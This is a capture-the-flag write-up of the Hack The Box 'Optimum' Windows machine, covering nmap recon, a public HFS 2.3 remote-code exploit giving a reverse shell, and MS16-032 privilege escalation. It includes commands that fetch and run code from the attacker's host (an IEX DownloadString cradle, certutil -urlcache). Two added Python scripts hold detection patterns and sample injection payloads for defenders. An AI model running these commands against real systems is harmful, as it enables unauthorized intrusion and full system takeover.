# Hackthebox - Optimum

* Windows

![Optimum](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-124ce844fcf256f001ca00cb1b68c00605937d3f%2FHTB-Optimum.png?alt=media)

* [Box on HTB](https://app.hackthebox.com/machines/6)

## Nmap

```bash
┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.10.8
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-10 19:50 EDT
Nmap scan report for 10.10.10.8
Host is up (0.022s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.56 seconds
```

## Port 80

* We have an HTTP File Server (HFS 2.3)\
  ![httpFileServer](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-dda8a7b2e4ec92539a98ed5460fa0d074500d065%2F2022-09-10-19-57-47.png?alt=media)
* If we google the version we find [this exploit](https://www.exploit-db.com/exploits/39161) right away
* We need nc.exe on our attacking machine. Kali ships the Windows binaries, so we can just copy it into our working directory: `cp /usr/share/windows-resources/binaries/nc.exe .`
* We serve netcat with Python's HTTP server: `python3 -m http.server 80`
* Then we modify the script to set our IP address and our port (I left 443)
* We start a listener: `rlwrap nc -lvp 443`
* We launch the exploit: `python2 39161 10.10.10.8 80`
* And we get a shell\
  ![shell](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-e9408b88a499965edbf8a1d8add64cec3fb80d25%2F2022-09-10-20-20-16.png?alt=media)
* We can grab the user flag\
  ![user flag](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-2c8313d2564b3e118e786510793234f8586dd861%2F2022-09-10-20-21-25.png?alt=media)
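From the defender's side, the HFS 2.3 weakness the linked exploit relies on (the server stops parsing a request parameter at a null byte, so `{.macro.}` directives can reach its scripting engine through the `search` parameter) leaves an obvious trace in web server logs. The following Python script is an added example, not part of the original writeup or of HFS itself: it reads access-log lines in Common Log Format (constructed sample lines, not real HFS output; HFS's own log format differs, so the `CLF_RE` regex would need adapting) and flags any request whose decoded query string carries a NUL byte or an HFS macro opener.

```python
"""Flag HTTP requests that look like HFS 2.3 macro injection attempts.

Legitimate search terms contain neither a null byte nor the `{.name`
macro opener, so either one in a decoded query string is worth an alert.
The check is done on the percent-decoded bytes so that encoded braces
(%7B / %7D) and %00 are caught as well as literal ones.
"""
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Constructed sample access-log lines in Common Log Format (not real HFS output).
SAMPLE_LOG = """\
10.10.14.3 - - [10/Sep/2022:20:15:01 -0400] "GET / HTTP/1.1" 200 1234
10.10.14.3 - - [10/Sep/2022:20:15:05 -0400] "GET /?search=report HTTP/1.1" 200 512
10.10.14.3 - - [10/Sep/2022:20:16:12 -0400] "GET /?search=%00{.exec|cmd.} HTTP/1.1" 200 100
10.10.14.3 - - [10/Sep/2022:20:16:40 -0400] "GET /?search=%7B.exec%7Ccmd.%7D HTTP/1.1" 200 100
10.10.14.3 - - [10/Sep/2022:20:17:00 -0400] "GET /files/notes.txt HTTP/1.1" 200 42
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD target PROTO", status, size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# HFS macros look like {.exec|...}, {.save|...}, ...: a brace, a dot, a macro name.
MACRO_OPENER = re.compile(r"\{\.[a-z]+", re.IGNORECASE)


def decoded_query(target: str) -> bytes:
    """Return the request's query string percent-decoded to raw bytes."""
    return unquote_to_bytes(urlsplit(target).query)


def is_hfs_macro_attempt(target: str) -> bool:
    """True if the request target carries a NUL byte or an HFS macro opener."""
    query = decoded_query(target)
    if b"\x00" in query:
        return True
    return MACRO_OPENER.search(query.decode("latin-1")) is not None


def scan_log(text: str) -> list:
    """Parse CLF lines and return the suspicious requests as dicts."""
    hits = []
    for line in text.splitlines():
        match = CLF_RE.match(line)
        if match is None:
            continue  # not a CLF line; skip rather than crash on junk
        if is_hfs_macro_attempt(match["target"]):
            hits.append({"ip": match["ip"], "ts": match["ts"], "target": match["target"]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} suspicious HFS request: {hit['target']}")
```

The two flagged lines are the literal `%00{.exec|...}` request and the fully percent-encoded variant; the plain `search=report` request and the static file download pass. Because the match runs on decoded bytes, the rule is not fooled by encoding the braces, which a string match on the raw log line would be.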

## Privesc

* Windows version

![win version](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-0f47e34e33c3010361c908b54d33f69ae5d7405f%2F2022-09-10-20-31-23.png?alt=media)

### Kernel exploits

* We run Sherlock (a PowerShell script that checks for missing privilege-escalation patches) in memory, served from our machine: `echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/Sherlock.ps1') | powershell -noprofile -`

![Local privesc](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-cde44af431a71304862d46dacdca8b70966087d9%2F2022-09-10-21-53-34.png?alt=media)

* Let's look for an exploit for MS16-032 other than the one Sherlock points to (that one does not work): `searchsploit ms16-032`

![searchsploit](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-ed0be46eb264ebe051f2d093751a47f3835e0c73%2F2022-09-10-21-58-36.png?alt=media)

* I tried a few exploits but none worked
* On Google I found [this exploit](https://www.exploit-db.com/exploits/41020)
* In the comments they mention [this exe file](https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe)
* We download it on our Kali machine
* We serve it with Python's HTTP server
* We fetch it on the target: `certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe`
* We launch it and get a SYSTEM shell

![system](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-953d132dbd3f734d3a66c6949c3a6a944fc2c2b4%2F2022-09-10-22-09-03.png?alt=media)
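The privesc steps above leave two classic traces in process-creation telemetry: `certutil -urlcache` pulling a file over HTTP, and a PowerShell download cradle (`IEX(New-Object Net.WebClient).DownloadString(...)`), here fed to `powershell -noprofile -` on stdin. The script below is an added example (not from the writeup, Sherlock or the exploit) that runs three hypothetical detection rules over constructed events modelled on the command-line fields of Windows event 4688 / Sysmon event 1; the field names `pid`, `image` and `cmdline` are an assumption of this example, not a real schema.

```python
"""Flag LOLBin download patterns in process-creation events.

Rules (hypothetical, for illustration):
  certutil-urlcache-download  : certutil.exe with -urlcache and an http(s) URL
  powershell-download-cradle  : any command line carrying WebClient / IEX text
  powershell-script-from-stdin: powershell.exe told to read its script from stdin
"""
import re

# Constructed sample events; values are made up to mirror the steps in the writeup.
SAMPLE_EVENTS = [
    {"pid": 1201, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe"},
    {"pid": 1202, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify cert.cer"},  # benign certutil use
    {"pid": 1203, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString"
                "('http://10.10.14.3/Sherlock.ps1') | powershell -noprofile -"},
    {"pid": 1204, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -noprofile -"},  # child of 1203; script body is on stdin
    {"pid": 1205, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# (rule name, image basename the rule applies to or None for any image, command-line pattern)
RULES = [
    ("certutil-urlcache-download",
     re.compile(r"^certutil(\.exe)?$", re.IGNORECASE),
     re.compile(r"-urlcache\b.*\bhttps?://", re.IGNORECASE)),
    ("powershell-download-cradle",
     None,
     re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest"
                r"|\bIEX\b|Invoke-Expression", re.IGNORECASE)),
    ("powershell-script-from-stdin",
     re.compile(r"^powershell(\.exe)?$", re.IGNORECASE),
     re.compile(r"\s-$")),  # a lone trailing '-' means "read the script from stdin"
]


def image_basename(image: str) -> str:
    """Strip the directory from a Windows image path."""
    return image.rsplit("\\", 1)[-1]


def classify(event: dict) -> list:
    """Return the names of every rule the event matches, in RULES order."""
    name = image_basename(event["image"])
    hits = []
    for rule, image_re, cmdline_re in RULES:
        if image_re is not None and image_re.search(name) is None:
            continue  # rule is scoped to a specific binary
        if cmdline_re.search(event["cmdline"]):
            hits.append(rule)
    return hits


def scan_events(events: list) -> list:
    """Return (pid, matched rules) for every event that matches at least one rule."""
    results = []
    for event in events:
        matched = classify(event)
        if matched:
            results.append((event["pid"], matched))
    return results


if __name__ == "__main__":
    for pid, matched in scan_events(SAMPLE_EVENTS):
        print(f"pid {pid}: {', '.join(matched)}")
```

Note what the stdin variant does to visibility: the PowerShell child process itself only shows `-noprofile -`, so the cradle text is visible in the parent's command line when it was launched through `cmd /c` (event 1203 here) and not at all when it was typed into an interactive shell. In that case PowerShell script block logging (event 4104) is what records the downloaded script body, which is why the third rule treats a stdin-fed PowerShell as suspicious on its own.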

* We can grab the root flag

![root](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-1cab3d19947fec7982ffbdd1cce4f525497102ee%2F2022-09-10-22-10-05.png?alt=media)
